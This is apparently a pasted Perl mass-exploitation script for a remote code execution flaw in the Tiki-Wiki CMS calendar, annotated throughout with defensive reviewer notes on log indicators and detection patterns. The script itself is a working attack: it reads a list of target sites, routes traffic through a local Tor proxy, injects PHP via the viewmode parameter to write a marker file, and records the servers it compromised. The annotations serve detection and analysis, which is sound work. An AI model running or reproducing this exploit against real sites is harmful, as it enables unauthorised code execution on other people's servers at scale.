3xploit3r

Tiki-Wiki CMS RCE

Aug 24th, 2016
  1. #!/usr/bin/perl
  2. #                        ->Coder By CrashBandicot
  3. #
  4. #                    Tiki-Wiki CMS Calendar 14.2, 12.5 LTS, 9.11 LTS, and 6.15 - Remote Code Execution
  5. #                     discovery by Dany Ouellet
  6. #                    ref: https://www.exploit-db.com/exploits/39965/
      #
      # Reviewer notes (defensive reading of this listing):
      #  - What it does: for every line of the file named in $ARGV[0] it sends one
      #    GET to <line>/tiki-calendar.php with a crafted `viewmode` parameter, then
      #    fetches <line>/hacker.txt and records the URL in savetiki.txt when the
      #    response body contains "hacker".
      #  - The header lists release numbers but does not say whether they are the
      #    affected or the fixed releases; confirm against the vendor advisory
      #    before using them as a patch baseline.
      #  - The marker file is only a proof of execution. The request carries PHP
      #    statements, so a host that wrote the file should be handled as a code
      #    execution incident, not as a stray text file.
      #  - Log indicators visible in this script: requests for tiki-calendar.php
      #    whose `viewmode` contains an encoded quote (%27) followed by `;` and PHP
      #    function names; a follow-up GET for /hacker.txt; the fixed User-Agent
      #    string set below. File name, file content and User-Agent are trivially
      #    changed, so detection should key on the shape of `viewmode`.
      #  - There is no `use strict` / `use warnings`; every variable below is a
      #    package global.
  7.  
  8. use LWP::UserAgent;
  9. use LWP::Protocol::socks;
  10. use HTTP::Request::Common;
  11.  
      # Cosmetic only: clears the terminal. Both commands are fixed strings.
  12. if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
      # Banner and usage text; printed unconditionally, before $ARGV[0] is looked at.
  13. print "
  14.                  
  15.               Tiki Mass Explo!ter RCE
  16.               by CrashBandicot        
  17.  
  18.         Usage : $0 list.txt
  19.  
  20. \n";
  21.  
  22.  
      # Two-argument open on a bareword handle: mode and path share one string, so
      # the command-line value is interpreted by open() itself. Each line read is
      # used as a base URL with no validation.
  23. open(tarrget,"<$ARGV[0]") or die "$!";
  24. while(<tarrget>){
  25. chomp($_);
  26. $webs = $_;
  27.  
  28. print " [+] Scanning -> $webs";
  29.  
      # Request path and query string. URL-decoded, the `viewmode` value begins
      # with a single quote and a semicolon, continues with fopen/fwrite/fclose
      # calls that create hacker.txt containing "by hacker", and ends by opening a
      # new quoted assignment -- presumably so the server-side code the value is
      # placed into still parses (the vulnerable code is not shown on this page).
      # A quote followed by `;` inside `viewmode` is the structural pattern a WAF
      # rule or log query can match on.
  30. $payload = '/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22hacker.txt%22,%27w%27);%20fwrite($z,(%22by%20hacker%22));fclose($z);$a=%27';
  31.  
      # A new user agent object is built on every iteration. All http/https
      # traffic goes through a SOCKS proxy on 127.0.0.1:9150; that is the port
      # Tor Browser's SOCKS listener uses by default, so source addresses in
      # server logs are likely to be proxy/Tor exits rather than the operator
      # (NOTE(review): inferred from the port number only).
  32. $ua = LWP::UserAgent->new();
  33. $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9150');
  34. $ua->timeout(30);
      # Fixed User-Agent claiming Firefox 3.5 on Windows NT 5.1 with a French
      # locale; usable as a low-confidence indicator in access logs.
  35. $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
      # The response to the injection request is stored but never read; success
      # is judged only by the follow-up fetch below.
  36. $fuck = $ua->get($webs.$payload);
  37.  
      # URL where the marker file is expected: directly under the base URL.
  38.  $def = $webs."/hacker.txt";
  39.  
      # Unanchored substring match on the body of the second response. Any page
      # containing "hacker" (for example an error page that echoes the requested
      # path) also counts as a hit, so an entry in the results file is not proof
      # that the file was written -- confirm on the host itself.
  40.  $check = $ua->get($def)->content;
  41.  if($check =~/hacker/) {
  42.  
  43.     print "\n\n  [+] File Uploaded >> $def\n";
  44.  
      # Appends the URL to savetiki.txt in the current directory. The result of
      # this open is not checked, so a failed open is not reported.
  45. open(save ,">>savetiki.txt");
  46. print save "$def\n";
  47. close save;
  48.  
  49.  
  50.  } else {  print "\n [-] File Upload Fail\n";   }
  51.  
  52.  
  53. }